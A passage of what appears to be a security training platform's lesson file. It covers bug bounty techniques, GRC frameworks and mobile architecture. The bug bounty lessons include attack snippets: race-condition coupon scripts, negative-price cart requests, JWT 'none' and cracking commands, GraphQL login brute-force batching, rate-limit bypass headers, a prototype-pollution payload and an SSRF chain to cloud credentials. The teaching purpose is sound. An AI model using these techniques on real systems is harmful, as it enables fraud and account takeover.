- **Price manipulation**: Changing quantities to negative numbers, modifying hidden price fields
- **Workflow bypass**: Skipping steps in multi-step processes (checkout, verification)
- **Feature abuse**: Using legitimate features in unintended ways

## Testing Approach

1. **Map the application flow**: Understand every step and decision point
2. **Question assumptions**: What happens if you skip step 2?
3. **Test boundaries**: Negative numbers, zero, maximum values, special characters
4. **Test concurrency**: Send simultaneous requests for time-sensitive operations

\`\`\`text
# Race condition testing with Turbo Intruder
# Send 20 simultaneous requests to redeem a coupon
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=20, requestsPerConnection=1, pipeline=False)
    for i in range(20):
        engine.queue(target.req)

# Price manipulation
POST /api/cart
{"item_id": 123, "quantity": -1, "price": 99.99}
# Result: negative total, credit to account
\`\`\`

## High-Impact Logic Bugs

- **Authentication bypass**: Password reset token reuse, OTP bypass
- **Payment manipulation**: Modify cart total, currency confusion, rounding errors
- **Privilege escalation**: Role parameter in registration, admin feature access
- **Data access**: Accessing other tenants' data in multi-tenant apps`,

  // ═══════════════════════════════════════════
  // BUG BOUNTY — API Security Testing
  // ═══════════════════════════════════════════

  "bb-api-recon": `## API Reconnaissance

Discovering and mapping APIs is essential for finding authentication bypasses, data exposure, and injection flaws.

## Finding API Endpoints

- Check \`/api/\`, \`/v1/\`, \`/v2/\`, \`/graphql\`
- Look for OpenAPI/Swagger docs: \`/swagger.json\`, \`/openapi.yaml\`, \`/api-docs\`
- Analyze JavaScript files for API calls
- Monitor network traffic while using the application
- Check mobile app traffic (often uses different APIs)

\`\`\`bash
# Fuzz for API endpoints
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt

# Check for documentation
curl -s https://target.com/swagger.json | jq .
curl -s https://target.com/.well-known/openapi.json
\`\`\`

## API Versioning Issues

- Old API versions (\`/v1/\`) may lack security fixes present in \`/v2/\`
- Try accessing deprecated endpoints
- Version headers: \`Api-Version: 1\`, \`Accept: application/vnd.api+json;version=1\`

## Authentication Mapping

- Identify auth mechanism: API keys, JWT, OAuth, session cookies
- Test each endpoint with: no auth, expired tokens, other users' tokens
- Check for rate limiting and account lockout`,

  "bb-auth-bypass": `## Authentication & JWT Attacks

Authentication is the gatekeepr — flaws here lead to account takeover.

## JWT Vulnerabilities

\`\`\`text
# 'none' algorithm attack
# Change alg to "none", remove signature
{"alg":"none","typ":"JWT"}.{"sub":"admin"}.

# Key confusion (RS256 → HS256)
# Sign with public key using HS256 when server expects RS256

# Weak secret brute-force
hashcat -m 16500 jwt.txt wordlist.txt
jwt_tool <token> -C -d wordlist.txt

# Missing expiration
# Check if tokens without exp claim are accepted forever
\`\`\`

## OAuth Vulnerabilities

- **Open redirect in redirect_uri**: Steal authorization codes
- **Missing state parameter**: CSRF in OAuth flow
- **Token leakage**: Tokens in URL fragments, referrer headers
- **Scope escalation**: Request higher scopes than authorized

## Password Reset Flaws

- Token reuse after password change
- Predictable tokens (timestamps, sequential)
- Host header injection in reset emails
- Rate limiting bypass on OTP verification

## Account Takeover Chains

- Email change without re-authentication → ATO
- Phone number swap without verification → ATO
- Social login linking without email verification → ATO`,

  "bb-graphql": `## GraphQL Security Testing

GraphQL APIs have unique attack surfaces compared to REST.

## Introspection

\`\`\`graphql
# Full introspection query
{__schema{types{name,fields{name,args{name,type{name}}}}}}

# Simplified query to list types
{__schema{types{name}}}

# List all queries and mutations
{__schema{queryType{fields{name}},mutationType{fields{name}}}}
\`\`\`

## Common Vulnerabilities

- **Excessive data exposure**: Query returns more fields than the UI shows
- **Nested query DoS**: Deeply nested queries consuming server resources
- **Batching attacks**: Send multiple operations in one request to bypass rate limits
- **Authorization bypass**: Query data through relationships that bypass field-level auth

\`\`\`graphql
# Nested query DoS
query {
  user(id: 1) {
    friends {
      friends {
        friends {
          friends { name }
        }
      }
    }
  }
}

# Batching to bypass rate limits
[
  {"query": "mutation { login(user:"a",pass:"pass1") { token }}"},
  {"query": "mutation { login(user:"a",pass:"pass2") { token }}"},
  {"query": "mutation { login(user:"a",pass:"pass3") { token }}"}
]
\`\`\`

## Tools

- **GraphQL Voyager**: Visual API exploration
- **InQL**: Burp Suite extension for GraphQL testing
- **graphql-cop**: Security auditor for GraphQL`,

  "bb-rate-limiting": `## Rate Limiting & Brute Force

Testing for missing or bypassable rate limiting can reveal critical vulnerabilities.

## Common Bypass Techniques

\`\`\`text
# IP rotation headers
X-Forwarded-For: 127.0.0.1
X-Real-IP: 1.2.3.4
X-Originating-IP: 5.6.7.8
X-Client-IP: 9.10.11.12

# Case variation in endpoints
POST /api/login
POST /Api/Login
POST /API/LOGIN

# Parameter pollution
POST /login?username=admin&username=admin

# Add null bytes or special chars
POST /api/login%00
POST /api/login/.
\`\`\`

## Testing Approach

- Identify rate-limited endpoints (login, password reset, OTP verification)
- Measure the threshold (how many requests before blocking)
- Test bypass techniques systematically
- Check if rate limiting is per-IP, per-account, or per-session

## OTP Bypass

- No rate limiting on OTP verification → brute-force 4-6 digit codes
- OTP not invalidated after use → replay attacks
- OTP in response body or headers
- Default/backdoor OTP codes (000000, 123456)`,

  // ═══════════════════════════════════════════
  // BUG BOUNTY — Report Writing
  // ═══════════════════════════════════════════

  "bb-report-writing": `## Writing Effective Bug Bounty Reports

A well-written report increases your chances of faster triage, higher bounties, and better reputation.

## Report Structure

1. **Title**: Clear, specific vulnerability description
2. **Severity**: CVSS score or platform severity rating
3. **Description**: What the vulnerability is and why it matters
4. **Steps to Reproduce**: Exact steps anyone can follow
5. **Impact**: Real-world consequences of exploitation
6. **Remediation**: How to fix the vulnerability
7. **Supporting Material**: Screenshots, videos, PoC code

## Writing Tips

- Be specific: "IDOR on /api/users/{id} allows accessing any user's PII" not "Authorization bug"
- Include exact URLs, parameters, and payloads
- Use screenshots with annotations
- Provide a video for complex multi-step bugs
- Show maximum impact without causing damage

## Impact Statement Examples

\`\`\`text
# Weak
"An attacker can access user data."

# Strong
"An attacker can access any user's personal information including name, email, 
phone number, and billing address by modifying the user_id parameter in 
GET /api/v2/users/{id}/profile. This affects all 50,000+ registered users 
and constitutes a violation of GDPR Article 5."
\`\`\``,

  "bb-triage-process": `## Triage & Communication

Understanding the triage process helps you navigate bounty programs effectively.

## Triage Flow

1. **New**: Report submitted, awaiting review
2. **Triaged**: Team confirmed the bug is valid
3. **Bounty**: Reward determined and paid
4. **Resolved**: Fix deployed and verified
5. **Closed**: Report closed (informative, duplicate, or N/A)

## Handling Common Responses

- **Duplicate**: Ask for the original report date; if yours was independent, request partial credit
- **Informative**: Provide additional impact analysis or exploitation steps
- **N/A (Not Applicable)**: Respectfully ask for clarification, provide more context
- **Needs More Info**: Respond promptly with requested details

## Communication Best Practices

- Be professional and patient — triage takes time (days to weeks)
- Don't demand bounties or threaten disclosure
- Provide additional context when asked
- Follow up after 30 days if no response
- Never test beyond scope or exploit production data`,

  "bb-platform-tips": `## Platform Strategy & Earnings

Maximize your bug bounty earnings with smart program selection and workflow optimization.

## Platform Comparison

- **HackerOne**: Largest platform, most programs, structured triage
- **Bugcrowd**: Strong private programs, VRT for severity guidance
- **Intigriti**: European focus, growing program list
- **YesWeHack**: European platform, competitive programs

## Earnings Optimization

- **Focus on 2-3 programs**: Deep knowledge beats wide scanning
- **Build reputation**: Higher signal → private program invites → higher payouts
- **Target new programs**: Less competition in the first weeks
- **Chain vulnerabilities**: Low-severity bugs chained = higher severity = higher payout
- **Write great reports**: Clear reports get triaged faster and can earn bonuses

## Time Management

- Track hours per program and earnings per hour
- Set daily/weekly goals
- Automate repetitive recon tasks
- Take breaks — burnout reduces effectiveness`,

  // ═══════════════════════════════════════════
  // BUG BOUNTY — Advanced Techniques
  // ═══════════════════════════════════════════

  "bb-race-conditions": `## Race Conditions & TOCTOU

Race conditions exploit timing gaps between checking and using a value.

## HTTP Race Conditions

\`\`\`python
# Using Python threading to exploit race conditions
import threading
import requests

def redeem_coupon():
    requests.post("https://target.com/api/redeem", 
                  json={"code": "DISCOUNT50"}, 
                  cookies={"session": "..."})

threads = [threading.Thread(target=redeem_coupon) for _ in range(20)]
for t in threads: t.start()
for t in threads: t.join()
\`\`\`

## Common Race Condition Targets

- **Coupon/gift card redemption**: Apply once, redeem many
- **Money transfers**: Send more than balance allows
- **Vote/like systems**: Multiple votes from one user
- **File upload + processing**: Upload then quickly overwrite
- **Invitation codes**: Use a single-use code multiple times

## HTTP/2 Single-Packet Attack

With HTTP/2, you can send multiple requests in a single TCP packet, ensuring simultaneous arrival:

- Burp Suite's **Turbo Intruder** supports this
- **Caido** also provides race condition testing

## Detection Tips

- Look for "check-then-act" patterns in the application
- Financial operations and limited-use resources are prime targets
- Test both API and UI paths — they may have different protections`,

  "bb-prototype-pollution": `## Prototype Pollution

Prototype pollution modifies JavaScript's Object.prototype, affecting all objects in the application.

## How It Works

\`\`\`javascript
// Vulnerable merge function
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === 'object') {
      target[key] = merge(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attack payload
merge({}, JSON.parse('{"__proto__":{"isAdmin":true}}'));

// Now ALL objects have isAdmin=true
let user = {};
console.log(user.isAdmin); // true!
\`\`\`

## Finding Prototype Pollution

- Look for merge/extend/clone functions processing user input
- Test with: \`__proto__[test]=polluted\` in query params
- Test with: \`{"__proto__":{"test":"polluted"}}\` in JSON body
- Check if \`constructor.prototype\` is also vulnerable

## Exploitation

- **Client-side**: Chain with XSS sinks (innerHTML, document.write)
- **Server-side**: Modify application behavior (bypass auth checks, enable debug mode)
- **DoS**: Pollute properties that cause crashes or infinite loops`,

  "bb-chaining": `## Vulnerability Chaining

Combining low-severity bugs into high-impact chains demonstrates real-world risk and earns higher bounties.

## Classic Chains

- **Self-XSS + CSRF** = Stored XSS (force victim to trigger self-XSS)
- **Open Redirect + OAuth** = Token Theft (redirect auth code to attacker)
- **SSRF + Cloud Metadata** = AWS Credential Theft
- **Info Disclosure + IDOR** = Account Takeover
- **XSS + CSRF** = Wormable Attack (self-propagating)

## Chain Examples

\`\`\`text
# Chain 1: Self-XSS → Account Takeover
1. Self-XSS in profile name (only visible to yourself)
2. CSRF on profile update endpoint (no CSRF token)
3. Craft page that CSRFs victim's profile with XSS payload
4. XSS fires when victim views their own profile → steal session

# Chain 2: SSRF → RCE
1. SSRF in image URL parameter
2. Access AWS metadata (169.254.169.254)
3. Steal IAM credentials
4. Use credentials to access S3, modify Lambda functions
5. Inject code into Lambda → RCE

# Chain 3: Info Disclosure → IDOR → ATO
1. API returns user UUIDs in public search results
2. Use UUIDs in /api/users/{uuid}/settings (no auth check)
3. Change email address
4. Password reset → full account takeover
\`\`\`

## Reporting Chains

- Document each link in the chain separately
- Show the full exploitation flow end-to-end
- Emphasize cumulative impact, not individual bug severity`,

  // ═══════════════════════════════════════════
  // GRC & COMPLIANCE — Security Frameworks
  // ═══════════════════════════════════════════

  "grc-nist-csf": `## NIST Cybersecurity Framework

The NIST CSF is a voluntary framework providing a common language for managing cybersecurity risk.

## Five Core Functions

1. **Identify (ID)**: Asset management, business environment, governance, risk assessment, risk management strategy
2. **Protect (PR)**: Access control, awareness training, data security, information protection, maintenance, protective technology
3. **Detect (DE)**: Anomalies and events, security continuous monitoring, detection processes
4. **Respond (RS)**: Response planning, communications, analysis, mitigation, improvements
5. **Recover (RC)**: Recovery planning, improvements, communications

## Implementation Tiers

- **Tier 1 (Partial)**: Ad hoc, reactive risk management
- **Tier 2 (Risk Informed)**: Risk management approved but not org-wide
- **Tier 3 (Repeatable)**: Formal, org-wide risk management
- **Tier 4 (Adaptive)**: Continuously improving, risk-informed decisions

## Framework Profile

A Profile aligns the Functions/Categories/Subcategories with business requirements:

- **Current Profile**: Where you are now
- **Target Profile**: Where you want to be
- **Gap Analysis**: Differences between current and target

## Practical Application

\`\`\`text
1. Prioritize and scope: What are your business objectives?
2. Orient: What systems, assets, and data support those objectives?
3. Create current profile: Where are you today?
4. Conduct risk assessment: What are the threats?
5. Create target profile: Where do you need to be?
6. Determine gaps: What needs to change?
7. Implement action plan: Close the gaps
\`\`\``,

  "grc-iso27001": `## ISO 27001 & ISMS

ISO 27001 is the international standard for Information Security Management Systems (ISMS).

## Key Clauses

- **Clause 4**: Context of the organization (stakeholders, scope)
- **Clause 5**: Leadership (management commitment, policy, roles)
- **Clause 6**: Planning (risk assessment, risk treatment, objectives)
- **Clause 7**: Support (resources, competence, awareness, communication, documentation)
- **Clause 8**: Operation (risk assessment execution, risk treatment implementation)
- **Clause 9**: Performance evaluation (monitoring, internal audit, management review)
- **Clause 10**: Improvement (nonconformities, corrective actions, continual improvement)

## Annex A Controls (2022)

ISO 27001:2022 has 93 controls in 4 themes:

- **Organizational** (37 controls): Policies, roles, threat intelligence
- **People** (8 controls): Screening, terms, awareness, remote working
- **Physical** (14 controls): Perimeters, offices, equipment, storage media
- **Technological** (34 controls): Endpoints, access rights, cryptography, logging

## Certification Process

1. **Gap analysis**: Compare current state to ISO 27001 requirements
2. **ISMS implementation**: Develop policies, procedures, controls
3. **Internal audit**: Verify ISMS effectiveness
4. **Stage 1 audit**: Documentation review by certification body
5. **Stage 2 audit**: Onsite assessment of ISMS implementation
6. **Certification**: 3-year certificate with annual surveillance audits`,

  "grc-cis-controls": `## CIS Controls v8

The Center for Internet Security Controls are a prioritized set of actions to protect against common cyber attacks.

## Implementation Groups

- **IG1**: Essential cyber hygiene (basic controls for all organizations)
- **IG2**: Larger organizations with IT staff managing enterprise infrastructure
- **IG3**: Organizations with security experts defending sensitive data

## The 18 Controls

1. **Inventory and Control of Enterprise Assets**
2. **Inventory and Control of Software Assets**
3. **Data Protection**
4. **Secure Configuration of Enterprise Assets and Software**
5. **Account Management**
6. **Access Control Management**
7. **Continuous Vulnerability Management**
8. **Audit Log Management**
9. **Email and Web Browser Protections**
10. **Malware Defenses**
11. **Data Recovery**
12. **Network Infrastructure Management**
13. **Network Monitoring and Defense**
14. **Security Awareness and Skills Training**
15. **Service Provider Management**
16. **Application Software Security**
17. **Incident Response Management**
18. **Penetration Testing**

## Mapping to Frameworks

CIS Controls map to NIST CSF, ISO 27001, PCI-DSS, and HIPAA. Implementing CIS Controls provides significant coverage across multiple compliance requirements simultaneously.`,

  "grc-soc2": `## SOC 2 Compliance

SOC 2 (System and Organization Controls 2) evaluates service organizations' controls related to the Trust Service Criteria.

## Trust Service Criteria

1. **Security** (Common Criteria — always required): Protection against unauthorized access
2. **Availability**: System uptime and operational performance
3. **Processing Integrity**: Accurate and complete data processing
4. **Confidentiality**: Protection of confidential information
5. **Privacy**: Personal information collection, use, retention, and disposal

## Type I vs Type II

- **Type I**: Point-in-time — are controls properly designed?
- **Type II**: Period of time (3-12 months) — are controls operating effectively?

## Preparing for SOC 2

\`\`\`text
1. Define scope: Which systems and services are covered?
2. Select criteria: Security + which additional criteria?
3. Gap assessment: Where do you fall short?
4. Implement controls: Policies, technical controls, procedures
5. Evidence collection: Logs, screenshots, tickets, reviews
6. Readiness assessment: Internal review before the audit
7. Audit: External auditor examines evidence and tests controls
8. Report: Auditor issues SOC 2 report with opinion
\`\`\`

## Common Control Failures

- Missing access reviews (quarterly user access reviews)
- No change management process
- Incomplete logging (not all systems send logs to SIEM)
- Missing vendor management program
- No documented incident response process`,

  // ═══════════════════════════════════════════
  // GRC — Risk Management
  // ═══════════════════════════════════════════

  "grc-risk-assessment": `## Risk Assessment Methodology

Risk assessment identifies, analyzes, and evaluates information security risks.

## Qualitative Risk Assessment

Uses subjective scales to rate likelihood and impact:

\`\`\`text
Likelihood:  1 (Rare) → 2 (Unlikely) → 3 (Possible) → 4 (Likely) → 5 (Almost Certain)
Impact:      1 (Negligible) → 2 (Minor) → 3 (Moderate) → 4 (Major) → 5 (Catastrophic)
Risk Score:  Likelihood × Impact = 1-25

Risk Matrix:
              Low Impact    Medium Impact    High Impact
High Likelihood    Medium        High           Critical
Med Likelihood     Low           Medium         High
Low Likelihood     Low           Low            Medium
\`\`\`

## Quantitative Risk Assessment

Uses financial values and probabilities:

- **Asset Value (AV)**: Dollar value of the asset
- **Exposure Factor (EF)**: Percentage of asset lost in an incident
- **Single Loss Expectancy (SLE)**: AV × EF
- **Annual Rate of Occurrence (ARO)**: How often per year
- **Annual Loss Expectancy (ALE)**: SLE × ARO

\`\`\`text
Example: Web server breach
AV = $500,000 (server + data value)
EF = 40% (estimated damage)
SLE = $500,000 × 0.4 = $200,000
ARO = 0.5 (once every 2 years)
ALE = $200,000 × 0.5 = $100,000/year
\`\`\`

## Risk Assessment Steps

1. Identify assets and their value
2. Identify threats and vulnerabilities
3. Assess likelihood and impact
4. Calculate risk scores
5. Prioritize risks for treatment`,

  "grc-risk-treatment": `## Risk Treatment & Mitigation

After assessing risks, you must decide how to handle each one.

## Four Risk Treatment Options

1. **Mitigate/Reduce**: Implement controls to reduce likelihood or impact
2. **Transfer**: Share risk with a third party (insurance, outsourcing)
3. **Accept**: Acknowledge and accept the risk (when cost of mitigation > risk)
4. **Avoid**: Eliminate the risk by removing the activity or asset

## Cost-Benefit Analysis

\`\`\`text
Is the control worth implementing?

ALE (before control) - ALE (after control) - Annual Cost of Control = Value

Example:
ALE before: $100,000/year
ALE after control: $10,000/year
Annual control cost: $25,000/year
Value: $100,000 - $10,000 - $25,000 = $65,000 net benefit → Implement!

If value is negative → control costs more than the risk → Consider accepting
\`\`\`

## Risk Acceptance

- Must be formally documented and signed by risk owner
- Define risk acceptance criteria (e.g., no risks above "High" accepted)
- Review accepted risks periodically (at least annually)
- Track compensating controls for accepted risks

## Control Types

- **Preventive**: Stop incidents before they occur (firewalls, access controls)
- **Detective**: Identify incidents when they occur (SIEM, IDS, audits)
- **Corrective**: Fix issues after detection (patches, incident response)
- **Compensating**: Alternative controls when primary controls aren't feasible`,

  "grc-third-party": `## Third-Party Risk Management

Organizations must manage risks introduced by vendors, suppliers, and partners.

## Vendor Assessment Process

1. **Due diligence questionnaire**: SIG (Standardized Information Gathering) or CAIQ
2. **Security certifications**: SOC 2, ISO 27001, PCI-DSS compliance evidence
3. **Penetration test results**: Recent third-party assessment reports
4. **Insurance**: Cyber insurance coverage and limits
5. **Contract review**: Data protection clauses, SLAs, breach notification requirements

## Risk Tiering

- **Critical**: Processes sensitive data, critical to operations
- **High**: Accesses internal systems or moderate data
- **Medium**: Limited data access, non-critical services
- **Low**: No data access, replaceable services

## Ongoing Monitoring

- Annual reassessment for critical vendors
- Continuous monitoring services (SecurityScorecard, BitSight)
- Incident notification requirements in contracts
- Right-to-audit clauses
- Exit strategy and data return/destruction procedures`,

  "grc-bcp-dr": `## Business Continuity & Disaster Recovery

BCP ensures critical business functions continue during disruptions. DR focuses on IT system recovery.

## Business Impact Analysis (BIA)

\`\`\`text
For each business process, determine:
- Maximum Tolerable Downtime (MTD): How long can this be down?
- Recovery Time Objective (RTO): How fast must we recover?
- Recovery Point Objective (RPO): How much data loss is acceptable?
- Minimum Business Continuity Objective (MBCO): Minimum service level

Example:
Process: Online payments
MTD: 4 hours
RTO: 2 hours
RPO: 0 (no transaction loss)
MBCO: Process 50% of normal volume
\`\`\`

## DR Strategies

- **Hot site**: Fully operational duplicate — minutes to failover
- **Warm site**: Hardware ready, needs data restoration — hours
- **Cold site**: Empty facility with power/network — days
- **Cloud DR**: Cloud-based recovery (AWS, Azure DR services)

## Testing Types

- **Tabletop exercise**: Discussion-based walkthrough of scenarios
- **Walkthrough/structured**: Step through procedures without activation
- **Simulation**: Simulated disaster, teams respond as if real
- **Parallel test**: Recovery systems activated alongside production
- **Full interruption**: Production shut down, full failover (highest risk)`,

  // ═══════════════════════════════════════════
  // GRC — Policy & Governance
  // ═══════════════════════════════════════════

  "grc-policy-development": `## Security Policy Development

Security policies establish management's expectations for information security.

## Policy Hierarchy

- **Policy**: High-level statement of intent (what and why) — approved by executive management
- **Standard**: Mandatory requirements (what specifically) — approved by CISO/security committee
- **Procedure**: Step-by-step instructions (how) — approved by department managers
- **Guideline**: Recommended practices (suggestions) — published by security team

## Essential Security Policies

1. **Information Security Policy**: Overall security program direction
2. **Acceptable Use Policy**: Rules for using organizational resources
3. **Access Control Policy**: Who gets access to what and how
4. **Data Classification Policy**: How to categorize and handle data
5. **Incident Response Policy**: How to handle security incidents
6. **Password Policy**: Password requirements and management
7. **Remote Work Policy**: Security requirements for remote access
8. **BYOD Policy**: Personal device usage rules
9. **Encryption Policy**: When and how to encrypt data
10. **Vendor Management Policy**: Third-party security requirements

## Writing Effective Policies

- Use clear, non-technical language where possible
- Define scope (who and what it applies to)
- Specify enforcement and consequences
- Include review cycle (annual minimum)
- Get executive sponsorship
- Make policies accessible to all employees`,

  "grc-governance": `## Security Governance Structure

Governance ensures security is aligned with business objectives and has appropriate oversight.

## Roles and Responsibilities

- **Board of Directors**: Ultimate accountability, approves risk appetite
- **CISO**: Leads security program, reports to C-suite
- **Security Committee**: Cross-functional oversight (IT, legal, HR, business)
- **Risk Manager**: Owns risk register and assessment process
- **Data Protection Officer**: GDPR compliance (where required)
- **Security Operations**: Day-to-day security activities

## Board Reporting

\`\`\`text
Quarterly Board Security Report should include:
1. Risk posture summary (heat map, trend)
2. Key incidents and responses
3. Compliance status (audits, certifications)
4. Security investment ROI
5. Emerging threats and strategic recommendations
6. Key metrics (MTTD, MTTR, vulnerability trends)
\`\`\`

## Governance Frameworks

- **COBIT**: IT governance and management framework
- **ITIL**: IT service management best practices
- **NIST RMF**: Risk management framework for federal systems

## Maturity Models

- **CMM Level 1 (Initial)**: Ad hoc, unpredictable
- **CMM Level 2 (Managed)**: Reactive, per-project
- **CMM Level 3 (Defined)**: Proactive, organization-wide
- **CMM Level 4 (Quantitatively Managed)**: Measured, controlled
- **CMM Level 5 (Optimizing)**: Continuously improving`,

  "grc-awareness": `## Security Awareness Programs

Effective awareness programs change behavior, not just check compliance boxes.

## Program Components

1. **Onboarding training**: Security basics for new employees
2. **Annual refresher**: Updated content on current threats
3. **Phishing simulations**: Regular simulated phishing campaigns
4. **Just-in-time training**: Training triggered by risky behavior
5. **Role-specific training**: Specialized content for developers, admins, executives
6. **Security champions**: Trained advocates in each department

## Measuring Effectiveness

\`\`\`text
Metrics to track:
- Phishing click rates (target: <5%)
- Phishing report rates (target: >70%)
- Training completion rates (target: >95%)
- Security incident reports from employees
- Password policy compliance
- Clean desk audit results
\`\`\`

## Best Practices

- Keep content short and engaging (microlearning)
- Use real-world examples and current events
- Gamify participation (leaderboards, rewards)
- Positive reinforcement over punishment
- Executive participation (lead by example)
- Test across channels (email, SMS, voice phishing)`,

  // ═══════════════════════════════════════════
  // GRC — Audit & Compliance
  // ═══════════════════════════════════════════

  "grc-audit-prep": `## Audit Preparation & Evidence

Proper audit preparation reduces stress and increases the likelihood of a clean audit opinion.

## Evidence Types

- **Policies and procedures**: Current, approved documentation
- **System configurations**: Screenshots, exports of security settings
- **Access reviews**: User access lists, approval records
- **Change management**: Change tickets, approvals, test results
- **Training records**: Completion certificates, attendance logs
- **Incident records**: Tickets, post-mortems, remediation evidence
- **Vendor assessments**: Questionnaires, certifications, contracts

## Preparation Timeline

\`\`\`text
6 months before: Gap assessment, identify missing controls
4 months before: Implement missing controls, update documentation
2 months before: Internal audit, evidence collection
1 month before: Pre-audit review, organize evidence repository
Audit week: Facilitate auditor requests, provide evidence promptly
Post-audit: Remediate findings, prepare management response
\`\`\`

## Evidence Management

- Use a centralized evidence repository (SharePoint, GRC platform)
- Organize by control framework and requirement
- Maintain chain of custody for evidence
- Keep evidence current (dated within audit period)
- Label evidence clearly with control mapping`,

  "grc-regulatory": `## Regulatory Compliance

Understanding key regulations helps organizations avoid fines and protect data.

## GDPR (General Data Protection Regulation)

- **Scope**: Any organization processing EU residents' personal data
- **Key rights**: Access, rectification, erasure, portability, objection
- **Lawful bases**: Consent, contract, legal obligation, vital interest, public interest, legitimate interest
- **Breach notification**: 72 hours to supervisory authority
- **Fines**: Up to €20M or 4% global turnover

## HIPAA (Health Insurance Portability and Accountability Act)

- **Scope**: Healthcare providers, health plans, clearinghouses, business associates
- **Key rules**: Privacy Rule, Security Rule, Breach Notification Rule
- **Safeguards**: Administrative, physical, technical
- **Breach notification**: 60 days for breaches affecting 500+ individuals

## PCI-DSS (Payment Card Industry Data Security Standard)

- **Scope**: Any entity that stores, processes, or transmits cardholder data
- **12 Requirements**: From firewalls to security testing
- **Validation**: SAQ (Self-Assessment Questionnaire) or QSA audit
- **Levels**: Based on transaction volume (Level 1 = 6M+ transactions/year)

## CCPA/CPRA (California Consumer Privacy Act / California Privacy Rights Act)

- **Scope**: Businesses meeting revenue/data thresholds serving California residents
- **Key rights**: Know, delete, opt-out of sale, non-discrimination
- **Fines**: $2,500 per violation, $7,500 per intentional violation`,

  "grc-metrics": `## Security Metrics & KPIs

Measuring security program effectiveness enables data-driven decisions and demonstrates value.

## Key Metrics Categories

### Operational Metrics
- **MTTD**: Mean Time to Detect threats
- **MTTR**: Mean Time to Respond/Remediate
- **Alert volume**: Total alerts and true/false positive rates
- **Patch compliance**: % systems patched within SLA
- **Vulnerability scan coverage**: % assets scanned regularly

### Risk Metrics
- **Open risks**: Count by severity and age
- **Risk treatment progress**: % risks with active treatment plans
- **Third-party risk scores**: Average vendor risk ratings
- **Residual risk trends**: Is overall risk decreasing?

### Compliance Metrics
- **Control effectiveness**: % controls passing testing
- **Audit findings**: Count by severity and remediation status
- **Training completion**: % employees completing required training
- **Policy exceptions**: Count and trend of approved exceptions

## Dashboard Design

\`\`\`text
Executive Dashboard (monthly):
├── Overall Risk Score: 7.2/10 (↓ from 7.8)
├── Critical Vulnerabilities: 12 (↓ 40%)
├── Mean Time to Detect: 4.2 hours (↓ from 6.1)
├── Compliance Status: 94% controls effective
├── Incidents This Month: 3 (1 High, 2 Medium)
└── Security Investment ROI: 340%
\`\`\``,

  // ═══════════════════════════════════════════
  // GRC — Data Privacy
  // ═══════════════════════════════════════════

  "grc-data-classification": `## Data Classification & Handling

Data classification categorizes information by sensitivity to apply appropriate protection controls.

## Classification Levels

\`\`\`text
Level 4 — Restricted/Secret
  Examples: Encryption keys, authentication credentials, trade secrets
  Controls: Encryption at rest and in transit, MFA, audit logging, need-to-know access

Level 3 — Confidential
  Examples: PII, financial data, HR records, customer data
  Controls: Encryption, access controls, DLP, data masking in non-prod

Level 2 — Internal
  Examples: Internal policies, org charts, project plans
  Controls: Access restricted to employees, basic access controls

Level 1 — Public
  Examples: Marketing materials, public website content, press releases
  Controls: Integrity controls (prevent unauthorized modification)
\`\`\`

## Data Handling Procedures

For each classification level, define:

- **Storage**: Where and how data can be stored
- **Transmission**: How data can be transmitted (encrypted email, SFTP)
- **Processing**: Where data can be processed (approved systems only)
- **Sharing**: Who can access and under what conditions
- **Retention**: How long data is kept
- **Disposal**: How data is securely destroyed (crypto-erase, shredding)`,

  "grc-privacy-program": `## Privacy Program Management

Building a comprehensive privacy program protects personal data and ensures regulatory compliance.

## Program Components

1. **Data mapping/inventory**: What personal data do you collect, process, store?
2. **Privacy Impact Assessments (PIAs/DPIAs)**: Assess privacy risks of new processing
3. **Privacy notices**: Clear communication about data practices
4. **Consent management**: Collect, record, and manage consent
5. **Data subject requests (DSRs)**: Processes for access, deletion, portability
6. **Breach response**: Privacy-specific incident response procedures
7. **Vendor management**: Privacy requirements in contracts (DPAs)

## Data Protection Officer (DPO)

Required under GDPR when:
- Public authority or body
- Core activities involve large-scale monitoring
- Core activities involve large-scale processing of special category data

DPO responsibilities:
- Inform and advise on data protection obligations
- Monitor compliance with GDPR and internal policies
- Cooperate with and act as contact for supervisory authorities
- Conduct or oversee DPIAs

## Cross-Border Data Transfers

- **Adequacy decisions**: EU recognizes certain countries as adequate
- **Standard Contractual Clauses (SCCs)**: Approved contract templates
- **Binding Corporate Rules (BCRs)**: Intra-group transfer mechanism
- **Transfer Impact Assessments (TIAs)**: Assess risks of transfers to third countries`,

  // ═══════════════════════════════════════════
  // MOBILE SECURITY — Fundamentals
  // ═══════════════════════════════════════════

  "mobile-android-arch": `## Android Architecture & Security

Understanding Android's architecture is essential for identifying security weaknesses.

## Android Architecture Layers

\`\`\`text
┌─────────────────────────┐
│    Applications          │  User-installed apps
├─────────────────────────┤
│  Application Framework   │  Activity Manager, Content Providers, etc.
├─────────────────────────┤
│    Android Runtime (ART) │  DEX bytecode execution
├─────────────────────────┤
│  Hardware Abstraction    │  Camera, Bluetooth, Sensors
├─────────────────────────┤
│    Linux Kernel          │  Process isolation, permissions
└─────────────────────────┘
\`\`\`

## Security Mechanisms

- **Application Sandbox**: Each app runs in its own Linux process with unique UID
- **Permissions Model**: Apps declare required permissions in AndroidManifest.xml
- **SELinux**: Mandatory Access Control for system-level enforcement
- **Verified Boot**: Ensures OS integrity from bootloader to system
- **App Signing**: APKs must be signed; updates must use same key

## Key Security Components

- **AndroidManifest.xml**: Declares components, permissions, intent filters
- **Content Providers**: Share data between apps (can be exported)
- **Broadcast Receivers**: Respond to system-wide events
- **Services**: Background processing (can be bound by other apps)
- **Intents**: Message objects for inter-component communication

## Common Weaknesses

- Exported components without proper permissions
- Insecure data storage (SharedPreferences, external storage)
- Weak WebView configuration (JavaScript enabled, file access)
- Hardcoded secrets in source code
- Missing certificate pinning`,

  "mobile-ios-arch": `## iOS Architecture & Security

iOS has a different security model from Android, with its own strengths and weaknesses.

## iOS Security Features

- **App Sandbox**: Each app has isolated file system access
- **Code Signing**: All code must be signed by Apple or enterprise certificate
- **Entitlements**: Fine-grained capability declarations
- **App Transport Security (ATS)**: Enforces HTTPS by default
- **Data Protection API**: Hardware-backed encryption with protection classes
- **Secure Enclave**: Hardware crypto processor for keys and biometrics
- **Keychain Services**: Secure credential storage

## Data Protection Classes

\`\`\`text
